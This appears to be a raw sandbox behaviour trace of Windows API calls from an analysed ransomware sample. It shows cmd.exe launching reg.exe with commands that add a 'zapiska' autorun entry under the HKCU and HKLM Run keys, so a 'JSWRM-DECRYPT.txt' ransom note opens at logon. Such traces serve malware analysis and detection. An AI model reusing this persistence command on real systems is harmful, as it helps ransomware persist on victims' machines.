GetProcessHeap () returned 0x750000 [0051.667] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x768e18) returned 0x40 [0051.667] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0051.667] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0051.667] GetProcessHeap () returned 0x750000 [0051.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1b4) returned 0x757e10 [0051.667] GetProcessHeap () returned 0x750000 [0051.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x360) returned 0x750ae0 [0051.673] GetProcessHeap () returned 0x750000 [0051.673] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x750ae0, Size=0x1b6) returned 0x750ae0 [0051.674] GetProcessHeap () returned 0x750000 [0051.674] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x750ae0) returned 0x1b6 [0051.674] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.674] GetProcessHeap () returned 0x750000 [0051.674] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xe0) returned 0x757fd0 [0051.674] GetProcessHeap () returned 0x750000 [0051.674] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x757fd0, Size=0x76) returned 0x757fd0 [0051.674] GetProcessHeap () returned 0x750000 [0051.674] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x757fd0) returned 0x76 [0051.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.698] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1ff1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ff1d8) returned 0xffffffff [0051.699] GetLastError () returned 0x2 [0051.699] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.699] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1ff1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ff1d8) returned 0xffffffff [0051.699] GetLastError () returned 0x2 [0051.699] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.699] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1ff1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ff1d8) returned 0x758050 [0051.699] GetProcessHeap () returned 0x750000 [0051.699] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x758090 [0051.700] FindClose (in: hFindFile=0x758050 | out: hFindFile=0x758050) returned 1 [0051.700] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x1ff1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ff1d8) returned 0xffffffff [0051.700] GetLastError () returned 0x2 [0051.700] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ff1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ff1d8) returned 0x758050 [0051.700] GetProcessHeap () returned 0x750000 [0051.700] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x758090, Size=0x4) returned 0x758090 [0051.700] FindClose (in: hFindFile=0x758050 | out: hFindFile=0x758050) returned 1 [0051.700] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0051.700] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0051.700] ??_V@YAXPAX@Z () returned 0x1 [0051.700] GetConsoleTitleW (in: lpConsoleTitle=0x1ff6dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0051.774] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ff608, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ff5f4 | out: lpAttributeList=0x1ff608, lpSize=0x1ff5f4) returned 1 [0051.774] UpdateProcThreadAttribute (in: lpAttributeList=0x1ff608, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ff5f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ff608, lpPreviousValue=0x0) returned 1 [0051.774] GetStartupInfoW (in: lpStartupInfo=0x1ff640 | out: lpStartupInfo=0x1ff640*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0051.774] GetProcessHeap () returned 0x750000 [0051.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x18) returned 0x758050 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0051.774] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0051.775] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0051.775] GetProcessHeap () returned 0x750000 [0051.775] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x758050) returned 1 [0051.775] GetProcessHeap () returned 0x750000 [0051.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa) returned 0x758050 [0051.775] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0051.777] _get_osfhandle (_FileHandle=1) returned 0x90 [0051.777] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0052.514] _get_osfhandle (_FileHandle=0) returned 0x8c [0052.514] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0052.558] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\reg.exe", lpCommandLine="reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x1ff590*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ff5dc | out: lpCommandLine="reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y", lpProcessInformation=0x1ff5dc*(hProcess=0xe0, hThread=0xdc, dwProcessId=0xeec, dwThreadId=0xf78)) returned 1 [0052.586] CloseHandle (hObject=0xdc) returned 1 [0052.586] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0052.586] GetProcessHeap () returned 0x750000 [0052.586] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x756d30) returned 1 [0052.586] GetEnvironmentStringsW () returned 0x756d30* [0052.586] GetProcessHeap () returned 0x750000 [0052.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xb1a) returned 0x754ca8 [0052.586] FreeEnvironmentStringsA (penv="=") returned 1 [0052.586] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0053.238] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0x1ff574 | out: lpExitCode=0x1ff574*=0x1) returned 1 [0053.238] CloseHandle (hObject=0xe0) returned 1 [0053.238] _vsnwprintf (in: _Buffer=0x1ff65c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ff57c | out: _Buffer="00000001") returned 8 [0053.238] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0053.239] GetProcessHeap () returned 0x750000 [0053.239] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x754ca8) returned 1 [0053.239] GetEnvironmentStringsW () returned 0x7582f0* [0053.239] GetProcessHeap () returned 0x750000 [0053.240] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xb40) returned 0x754ca8 [0053.240] FreeEnvironmentStringsA (penv="=") returned 1 [0053.240] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0053.240] GetProcessHeap () returned 0x750000 [0053.240] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x754ca8) returned 1 [0053.240] GetEnvironmentStringsW () returned 0x7582f0* [0053.240] GetProcessHeap () returned 0x750000 [0053.240] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xb40) returned 0x754ca8 [0053.240] FreeEnvironmentStringsA (penv="=") returned 1 [0053.240] GetProcessHeap () returned 0x750000 [0053.240] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x758050) returned 1 [0053.240] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ff608 | out: lpAttributeList=0x1ff608) [0053.240] ??_V@YAXPAX@Z () returned 0x1 [0053.240] _get_osfhandle (_FileHandle=1) returned 0x90 [0053.240] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0053.290] _get_osfhandle (_FileHandle=1) returned 0x90 [0053.290] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0053.362] _get_osfhandle (_FileHandle=1) returned 0x90 [0053.362] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0053.732] _get_osfhandle (_FileHandle=0) returned 0x8c [0053.732] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0053.923] _get_osfhandle (_FileHandle=0) returned 0x8c [0053.926] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0054.077] SetConsoleInputExeNameW () returned 0x1 [0054.078] GetConsoleOutputCP () returned 0x1b5 [0054.151] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0054.151] SetThreadUILanguage (LangId=0x0) returned 0x210409 [0054.162] exit (_Code=1) [0054.162] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 36 os_tid = 0x2ac Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6e3b000" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xd04" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0x788 Thread: id = 30 os_tid = 0xd34 Thread: id = 31 os_tid = 0xd2c Thread: id = 33 os_tid = 0x7a4 Thread: id = 34 os_tid = 0x58 Process: id = "7" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x704a000" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x3fc" cmd_line = "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0xd10 [0050.567] GetModuleHandleA (lpModuleName=0x0) returned 0xa40000 [0050.567] __set_app_type (_Type=0x1) [0050.567] __p__fmode () returned 0x77ae3c14 [0050.567] __p__commode () returned 0x77ae49ec [0050.567] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa4c780) returned 0x0 [0050.567] __wgetmainargs (in: _Argc=0xa4d028, _Argv=0xa4d02c, _Env=0xa4d030, _DoWildCard=0, _StartInfo=0xa4d03c | out: _Argc=0xa4d028, _Argv=0xa4d02c, _Env=0xa4d030) returned 0 [0050.567] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0050.591] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0050.591] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x2ddf9dc | out: phkResult=0x2ddf9dc*=0x0) returned 0x2 [0050.591] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0050.591] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0050.591] GetProcessHeap () returned 0x3090000 [0050.591] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x10) returned 0x3097b38 [0050.591] lstrlenW (lpString="") returned 0 [0050.591] GetProcessHeap () returned 0x3090000 [0050.591] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x2) returned 0x3094640 [0050.591] GetProcessHeap () returned 0x3090000 [0050.591] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3094378 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x10) returned 0x3097be0 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3094138 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3093d18 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3093d38 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3093d58 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x10) returned 0x3097bf8 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x30943f8 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3094418 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3094438 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x30948d8 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x10) returned 0x3097c10 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x30948f8 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3094918 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3094938 [0050.592] GetProcessHeap () returned 0x3090000 [0050.592] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3094a88 [0050.592] SetThreadUILanguage (LangId=0x0) returned 0x2e90409 [0050.603] GetProcessHeap () returned 0x3090000 [0050.603] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x10) returned 0x3097b80 [0050.603] _memicmp (_Buf1=0x3097b80, _Buf2=0xa41b8c, _Size=0x7) returned 0 [0050.603] GetProcessHeap () returned 0x3090000 [0050.603] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x1e) returned 0x3093ad8 [0050.603] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0050.603] GetProcessHeap () returned 0x3090000 [0050.603] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x10) returned 0x3097c28 [0050.603] _memicmp (_Buf1=0x3097c28, _Buf2=0xa41b8c, _Size=0x7) returned 0 [0050.603] GetProcessHeap () returned 0x3090000 [0050.603] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x6c) returned 0x3093b00 [0050.603] _vsnwprintf (in: _Buffer=0x3093ad8, _BufferCount=0xe, _Format="|%s|", _ArgList=0x2ddf8f0 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0050.604] _vsnwprintf (in: _Buffer=0x3093b00, _BufferCount=0x35, _Format="|%s|", _ArgList=0x2ddf8f0 | out: _Buffer="|HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0050.604] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0050.604] lstrlenW (lpString="|HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0050.604] RtlRestoreLastWin32Error () returned 0x2e92000 [0050.604] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0050.604] GetProcessHeap () returned 0x3090000 [0050.604] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x66) returned 0x30941b8 [0050.604] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0050.604] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0050.605] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0050.605] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0050.605] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0050.605] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0050.605] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0050.605] StrChrIW (lpStart="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" [0050.606] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0050.606] GetProcessHeap () returned 0x3090000 [0050.606] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x28) returned 0x3094228 [0050.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0050.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0050.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0050.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0050.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 